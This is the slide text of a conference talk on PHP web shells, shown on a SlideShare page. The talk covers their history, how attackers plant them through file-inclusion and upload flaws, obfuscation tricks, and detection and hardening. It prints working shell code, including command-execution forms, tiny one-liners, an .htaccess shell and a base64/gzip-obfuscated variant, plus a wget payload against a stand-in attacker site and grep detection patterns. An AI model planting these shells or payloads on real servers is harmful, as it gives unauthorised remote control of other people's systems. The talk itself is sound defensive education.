SlideShare ist ein Scribd-Unternehmen logo

TakeDownCon Rocket City: WebShells by Adrian Crenshaw

Als PPTX, PDF herunterladen
EC-Council
EC-Council
TechnologieDesign
1 von 45
History, Techniques, Obfuscation and Automated Collection Adrian Crenshaw http://Irongeek.com
     I run Irongeek.com I have an interest in InfoSec education I don’t know everything - I’m just a geek with time on my hands Sr. Information Security Engineer at Diebold, doing managed services and pen-test work Co-Founder of Derbycon http://www.derbycon.com http://Irongeek.com Twitter: @Irongeek_ADC
  Scripts that act as back doors for maintaining access Common tasks:         File Management Command line access Database server access Bruteforcing Network Scanning Pivots Versions for all sorts of web development environments: PHP, ASP.NET, JSP, etc. Think of it as a RAT (Remote Access Tool/Trojan) for the web http://Irongeek.com
  I wanted to be like Jason Scott…and failed Attribution is hard     Old security warning from 1994 http://techpubs.sgi.com/library/dynaweb_docs/0620/SGI_Developer /books/NetscapeSrv_PG/sgi_html/ch01.html Versions of C99 labled “!C99Shell v. 1.0 beta (21.05.2005)!” Search for c99shell before 1/01/2005 turns up plenty of shells, but not historical information Seems to tie to 7/26/1997 (Jul 26, 1997)  filetype:txt PHP daterange:2450654-2450656 http://Irongeek.com
 My first experiences were at a school where we could put up homepages that used PHP   shell_exec($command) for the win! Shoveling a Shell using PHP Insecurities (2/12/2004) http://www.irongeek.com/i.php?page=security/phpshell  I’ve been pwned by them before http://Irongeek.com
      File upload vulnerabilities Insecure FTP Command Injection Remote File Includes/Local File Includes Exploits on other sites on the same shared host Other Exploits   SQL Injection Vulnerable services http://Irongeek.com
1. Client makes a request to a site with an RFI vulnerability 2. Vulnerable web server grabs malicious file off of another server 3. File is included in code executed on the vulnerable web server 4. Attacker then executes commands on the remote vulnerable web server, uploads different shells, grabs files, etc. http://Irongeek.com
   Set browser’s user agent to: <?php system(‘wget http://attackerssite.com/shell.txt -O shell.php’);?> LFI with: http://somesite.com/index.php?page=../../../../pro c/self/environ More at http://www.brianhaddock.com/2011/gaining-shellaccess-via-local-file-inclusion-vulnerabilities http://Irongeek.com
        C99 C100 r57 Fx29SheLL PLaToShell b374k WSO Weevely http://Irongeek.com
   Started as a project to show off web vulnerabilities Like WebGoat, but designed to be easier to use and PHP based I started it, but Jeremy Druin is in charge of it now and has way more code in it than I do http://Irongeek.com
<FORM ENCTYPE="multipart/form-data" ACTION="<?php echo "http://" . $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];?>" METHOD="POST"> Send this file: <INPUT NAME="userfile" TYPE="file"> <INPUT TYPE="submit" VALUE="Send"> </FORM> <?php if ($_FILES["userfile"]["error"] > 0){ echo "Error: " . $_FILES["userfile"]["error"] . "<br>"; }else{ if ($_FILES["userfile"]["name"] != ""){ echo "Upload: " . $_FILES["userfile"]["name"] . "<br>"; echo "Type: " . $_FILES["userfile"]["type"] . "<br>"; echo "Size: " . ($_FILES["userfile"]["size"] / 1024) . " kB<br>"; echo "Stored in: " . $_FILES["userfile"]["tmp_name"] . "<br>"; if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $_FILES["userfile"]["name"])){ echo "Moved to: " . getcwd() . "/" . $_FILES["userfile"]["name"]; }else{ echo '<font color="$FF0000">Upload failed, may not have permission.</font>'; }}} #Based on examples from: http://www.w3schools.com/php/php_file_upload.asp ?> http://Irongeek.com
<HTML><BODY> <FORM METHOD="post" ACTION="<?php echo "http://" . $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];?>"> <INPUT TYPE="TEXT" NAME="command"> <INPUT TYPE="Submit"> </FORM> <PRE> <?php $command = str_replace("","",$_POST[command]); echo "<B>Results for $command: </B><P>"; $results = str_replace("<","&lt;",shell_exec($command)); $results = str_replace(">","&gt;",$results); echo $results; ?> </PRE> </BODY></HTML> http://Irongeek.com
    Example 1: <?=($_=@$_GET[2]).@$_($_GET[1])?> Example 2: <?echo `$_GET[1]`?> Could not get these to RFI Inspired By Fredrik Almroth http://h.ackack.net/2011/09/tiny-php-shell/ http://Irongeek.com
RFI the uploader 1.   2. Simpler Smaller Upload a shell http://Irongeek.com
    Repositories http://www.sh3ll.org http://www.r57.gen.tr http://c99.gen.tr http://c99php.com https://github.com/nikicatg/web-malwarecollection/tree/master/Backdoors Laudanum (shell, proxy, DNS recon, reverse shell) http://laudanum.secureideas.net Kali Linux Look in  /usr/share/webshells under platform folders aspx, cfm, jsp, perl and php My Script http://irongeek.com/i.php?page=webshells-and-rfis http://Irongeek.com
   Ran periodically by a cron job Reads lines from recent access logs Greps for likely RFIs, then adds them to old unique RFIs and makes sure they are still unique       Request contains “=http://” (and https) Requested file ends in txt|.inc|.dat|.bak Checks to see if they are still active Outputs the attacker IP, whois link, URL to webshell, referer, time, etc. Saves uniques for later If it does not error out, and the file does not exist, it makes an archive copy http://Irongeek.com
Why not let the hosting site know they are serving a shell? User Agent String:  Hello, I'm not attacking your site, but someone else tried using this file on your server as an RFI against my site. Contact Irongeek at Irongeek.com for more details http://www.irongeek.com/i.php?page=webshells-and-rfi http://Irongeek.com
   Uploaders General Webshells Testers/IDers   Search Engine Spammers   Just show the links to search engines based on user agent strings to get higher ranking via back links Booters    Just emails the attacker that a site in vulnerable, maybe gives a bit of information about the system Botnets based on webshells Webservers generally have more bandwidth than workstations Local rooters  Elevate privileges using local exploits http://Irongeek.com
     gzinflate() / gzdeflate() Meant to allow for compressed data base64_decode() / base64_encode() Meant to allow for binary data to me stored as printable ASCII Others: str_rot13() / rawurlencode() / strrev() Truncated example: <? eval(gzinflate(base64_decode('pZL ….OyA=')); ?> Useful decoder: https://defense.ballastsecurity.net/decoding/ http://Irongeek.com
echo '<HTML><BODY><FORM METHOD="post" ACTION="'."http://" . $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI].'"><INPUT TYPE="TEXT" NAME="command"><INPUT TYPE="Submit"></FORM><PRE>'; $command = str_replace("","",$_POST[command]); echo "<B>Results for $command: </B><P>"; $results = str_replace("<","&lt;",shell_exec($command)); $results = str_replace(">","&gt;",$results); echo $results; echo "</PRE></BODY></HTML>"; Run through http://www.mobilefish.com/services/php_obfuscator/php_obfuscator.php <?php eval(gzinflate(base64_decode(str_rot13('qMSsn4ZjSZKs+lxhS5xIve7KTXue ufY8fkwUFvsFhJjBqVdzfV+/XNdwfQlR5CV7557YyIKqtHxPRG1F4vsURlHCPL 8tLvWVwu723ntDQipvGTVCGEgecsd94lQLLWDM48+Za81NvYDZxxlLkq86 M085l0FM87PjGnDxwAAptQvymRCOKtEPsVw0h+en9iY9sxAx17s2F+zvZ0J vWBJZzh7TJTwjLSEQBpv+hIElv6/64N6alluGUrn8tVKyjxMBtlYkXMswgIRws UDQeSM7VV6iT1QH9fZP3AtG7K3KXOq3Ll2occD/fgdhOco1i5OBjf9WhOVn ahBfs3qA50jw6vwmUck5Xrw+Nt==')))); ?> http://Irongeek.com
   GET is in the URL, POST is in the request headers POST method less likely to be logged than GET With a custom client, stealth commands via:    Cookie headers Non-cookie headers Multiple levels of obfuscation making it computationally expensive to decode http://Irongeek.com
      Available at: http://code.google.com/p/b374k-shell/ Simple “Polymorphic” version Database functionality Process explorer Reverse and bind shells http://Irongeek.com
             Available at: https://github.com/epinna/Weevely Tiny, encrypted, communication over cookies, tons of modules: Enumerate users and /etc/passwd content Check php security configurations Crawl and enumerate web folders files permissions Find wrong system files permissions Guess files with wrong permissions in users home folders Bruteforce all SQL users Bruteforce SQL username Collect system informations Send reverse TCP shell Open a shell on TCP port Execute system shell command http://Irongeek.com             Execute PHP statement Mount remote filesystem using HTTPfs Change file timestamps Remove remote files and folders Get SQL database dump Run SQL console or execute single queries Install and run Proxy to tunnel traffic through target Print interfaces addresses Port scan open TCP ports Install remote PHP proxy Find files with write Find files with superuser flags
# <!-- Self contained .htaccess web shell - Part of the htshell project # Written by Wireghoul - http://www.justanotherhacker.com # Override default deny rule to make .htaccess file accessible over web <FilesEmbed it in other scripts code that is already on  ~ "^.ht"> Order allow,deny site Allow from all  Put </Files> in an .htaccess file the See Eldar “Wireghoul” Marcussen’s work: # Make .htaccess file be interpreted as php file. This occur after apache has https://github.com/wireghoul/htshells interpreted # the apache directoves from the .htaccess file AddType application/x-httpd-php .htaccess ###### SHELL ###### <?php echo "--><form method='get'><input type='text' name='c' value='".$_GET['c']."'><input type='submit' name='go' value='Go!'></form>n<pre>";passthru($_GET['c']." 2>&1");echo "</pre>"; ?> http://Irongeek.com
 Attackers don’t want others finding their shells and using them <?php if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404"); exit("<h1>Not Found</h1>");}… http://Irongeek.com
//Example from Laudanum $allowedIPs = array("192.168.1.55", "12.2.2.2"); $allowed = 0; foreach ($allowedIPs as $IP) { if ($_SERVER["REMOTE_ADDR"] == $IP) $allowed = 1; } if ($allowed == 0) { header("HTTP/1.0 404 Not Found"); die(); } http://Irongeek.com
 How well do the think that will work for them? <?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. … http://Irongeek.com
http://Irongeek.com
  Ugly, but works: grep -i "=http://" access.log | grep -i ".txt|.inc.|.dat" May like my script better http://Irongeek.com
   Look for “bad” functions grep -RPnl "(gzinflate|eval|base64_decode)" /var/www/ No perfect list Many false positives http://Irongeek.com
   AV will mostly miss them PHP-Shell-Detector Just signature based to my knowledge Scans: php/perl/asp/aspx https://github.com/emposha/PHP-Shell-Detector NeoPI Detects on Signatures, Entropy, Longest Word and Index of Coincidence Scans: php/asp/aspx/sh/bash/zsh/csh/tsch/pl/py/cgi/cfm https://github.com/Neohapsis/NeoPI http://Irongeek.com
   Grep PHP-Shell-Detector NeoPI http://Irongeek.com
http://Irongeek.com
http://Irongeek.com
      Defaults may be ok, but stuff happens Test installs like XAMPP may be ran as the user Moving files from one place to another can have unintended consequences Shared hosting may have your site running under your account, giving scripts permission to your files Check for writable files? find /var/www/ -user www-data -perm -u=w –ls find /var/www/ -perm -2 -ls Use with caution, just for world writeables: find /var/www -type d -exec chmod 2775 {} + find /var/www -type f -exec chmod 0664 {} + http://Irongeek.com
Much of the following text copied from /etc/php5/apache2/php.ini http://Irongeek.com
    Allow ASP-style <% %> tags. asp_tags = Off http://php.net/asp-tags PHP Banner in web server header expose_php = On http://php.net/expose-php Whether to allow HTTP file uploads. file_uploads = On http://php.net/file-uploads Display Errors display_errors = On http://php.net/display-errors http://Irongeek.com
   Whether to allow the treatment of URLs (like http:// or ftp://) as files. allow_url_fopen = On http://php.net/allow-url-fopen Whether to allow include/require to open URLs (like http:// or ftp://) as files. (Off by default in now.) allow_url_include = Off http://php.net/allow-url-include Disable easily abused functions disable_functions=system,exec,passthru,shell_exec http://php.net/manual/en/ini.core.php#ini.disablefunctions http://Irongeek.com
     “DEPRECATED as of PHP 5.3.0 and REMOVED as of PHP 5.4.0” Many functions modified so UID of the script and the files/directories operated on are the same. Some functions like shell_exec() disabled Others like exec() system() require the executable to be in safe_mode_exec_dir Way more details here: http://www.php.net/manual/en/features.safemode.functions.php http://Irongeek.com
     Host based WAF Available at: http://www.modsecurity.org modsecurity_crs_45_trojans.conf Changed my config to: SecRuleEngine On SecDefaultAction "phase:4,deny,log,status:500“ Signature based, so same rule applies as AV http://Irongeek.com
   Turn off Directory indexing Add this to .htaccess file or Directory configs: Options -Indexes An example of why: http://www.google.com/?q=intitle:index.of+c99.txt http://Irongeek.com
  Shared Hosting MD5 Change Detection Script http://www.irongeek.com/i.php?page=security/sha red-hosting-md5-change-detection-script Script To Grep For RFI, Webshells, Password Grabs, Web Scanners, Etc. http://www.irongeek.com/i.php?page=security/log watch-script-grep-for-rfis-webscanners-webshellattacks http://Irongeek.com
      Writing a stealth web shell and .htaccess shells by Eldar “Wireghoul” Marcussen http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html http://www.justanotherhacker.com/projects/htshells/ Effectiveness of Antivirus in Detecting Web Application Backdoors by Rahul “FB1H2S” Sasi http://www.exploit-db.com/wp-content/themes/exploit/docs/16082.pdf Detecting Obfuscated Web Shells Talk by Scott Behrens http://www.youtube.com/watch?v=gRSKuAS71pI Web Shell Detection Using NeoPI by Scott Behrens and Ben Hagen http://resources.infosecinstitute.com/web-shell-detection/ Threat: DDoS Booter Shell Scripts http://www.prolexic.com/pdf/Prolexic_Threat_Advisory_DDoS_Booter_Scripts_ 052612.pdf Booting the Booters, Stressing the Stressors - Allison Nixon and Brandon Leven http://www.irongeek.com/i.php?page=videos/bsidesri2013/2-0-booting-thebooters-stressing-the-stressors-allison-nixon-and-brandon-levene http://Irongeek.com
Derbycon Sept 25th-29th, 2013 Derbycon Art Credits to DigiP Photo Credits to KC (devauto) http://www.derbycon.com Others http://www.louisvilleinfosec.com http://skydogcon.com http://hack3rcon.org http://Irongeek.com http://outerz0ne.org http://phreaknic.info http://notacon.org
42 Twitter: @Irongeek_ADC http://Irongeek.com

Empfohlen

Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP ShellsVedran Krivokuca
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Enginesc0c0n - International Cyber Security and Policing Conference
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacksRoberto Suggi Liverani
 
How to convince a malware to avoid us
How to convince a malware to avoid usHow to convince a malware to avoid us
How to convince a malware to avoid usCsaba Fitzl
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsYury Chemerkin
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeilFramework
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-PillageVeilFramework
 

Empfohlen

Anatomy of PHP Shells
Anatomy of PHP ShellsAnatomy of PHP Shells
Anatomy of PHP ShellsVedran Krivokuca
 
Web-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting EnginesWeb-App Remote Code Execution Via Scripting Engines
Web-App Remote Code Execution Via Scripting Enginesc0c0n - International Cyber Security and Policing Conference
 
Defending Against Application DoS attacks
Defending Against Application DoS attacksDefending Against Application DoS attacks
Defending Against Application DoS attacksRoberto Suggi Liverani
 
How to convince a malware to avoid us
How to convince a malware to avoid usHow to convince a malware to avoid us
How to convince a malware to avoid usCsaba Fitzl
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!Soroush Dalili
 
TriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsTriplePlay-WebAppPenTestingTools
TriplePlay-WebAppPenTestingToolsYury Chemerkin
 
Veil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeil-PowerView - NovaHackers
Veil-PowerView - NovaHackersVeilFramework
 
Defcon - Veil-Pillage
Defcon - Veil-PillageDefcon - Veil-Pillage
Defcon - Veil-PillageVeilFramework
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?Aditya K Sood
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkVeilFramework
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestCsaba Fitzl
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Nikto
NiktoNikto
NiktoSorina Chirilă
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
 
20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanismsCsaba Fitzl
 
Understand study
Understand studyUnderstand study
Understand studyAntonio Costa aka Cooler_
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resourcesAntonio Costa aka Cooler_
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 n|u - The Open Security Community
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSCsaba Fitzl
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
 

Weitere ähnliche Inhalte

Was ist angesagt?

HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?Aditya K Sood
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkVeilFramework
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestCsaba Fitzl
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesMichele Orru
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNoSuchCon
 
20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanismsCsaba Fitzl
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassRob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitjaredhaight
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSCsaba Fitzl
 

Was ist angesagt? (20)

HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
BH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-frameworkBH Arsenal '14 TurboTalk: The Veil-framework
BH Arsenal '14 TurboTalk: The Veil-framework
 
Getting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfestGetting root with benign app store apps vsecurityfest
Getting root with benign app store apps vsecurityfest
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
When you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the massesWhen you don't have 0days: client-side exploitation for the masses
When you don't have 0days: client-side exploitation for the masses
 
Nikto
NiktoNikto
Nikto
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new black
 
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the CoreNSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
NSC #2 - D3 02 - Peter Hlavaty - Attack on the Core
 
20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms20+ ways to bypass your mac os privacy mechanisms
20+ ways to bypass your mac os privacy mechanisms
 
Understand study
Understand studyUnderstand study
Understand study
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Introducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkitIntroducing PS>Attack: An offensive PowerShell toolkit
Introducing PS>Attack: An offensive PowerShell toolkit
 
WAF protections and bypass resources
WAF protections and bypass resourcesWAF protections and bypass resources
WAF protections and bypass resources
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014 Secuirty News Bytes-Bangalore may 2014
Secuirty News Bytes-Bangalore may 2014
 
Exploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOSExploiting Directory Permissions on macOS
Exploiting Directory Permissions on macOS
 

Ähnlich wie TakeDownCon Rocket City: WebShells by Adrian Crenshaw

Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
 
Ch 22: Web Hosting and Internet Servers
Ch 22: Web Hosting and Internet ServersCh 22: Web Hosting and Internet Servers
Ch 22: Web Hosting and Internet Serverswebhostingguy
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security ClassRich Helton
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingColdFusionConference
 
Secure Code Warrior - Local file inclusion
Secure Code Warrior - Local file inclusionSecure Code Warrior - Local file inclusion
Secure Code Warrior - Local file inclusionSecure Code Warrior
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 
Art of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoArt of Web Backdoor - Pichaya Morimoto
Art of Web Backdoor - Pichaya MorimotoPichaya Morimoto
 
Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)Best practices of web app security (samvel gevorgyan)
Best practices of web app security (samvel gevorgyan)ClubHack
 
Selenium & PHPUnit made easy with Steward (Berlin, April 2017)
Selenium & PHPUnit made easy with Steward (Berlin, April 2017)Selenium & PHPUnit made easy with Steward (Berlin, April 2017)
Selenium & PHPUnit made easy with Steward (Berlin, April 2017)Ondřej Machulda
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
Web Browser Basics, Tips & Tricks - Draft 20 (Revised 5/18/17)
Web Browser Basics, Tips & Tricks - Draft 20 (Revised 5/18/17)Web Browser Basics, Tips & Tricks - Draft 20 (Revised 5/18/17)
Web Browser Basics, Tips & Tricks - Draft 20 (Revised 5/18/17)msz
 

Ähnlich wie TakeDownCon Rocket City: WebShells by Adrian Crenshaw (20)

Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox Addons
 
Ch 22: Web Hosting and Internet Servers
Ch 22: Web Hosting and Internet ServersCh 22: Web Hosting and Internet Servers
Ch 22: Web Hosting and Internet Servers
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
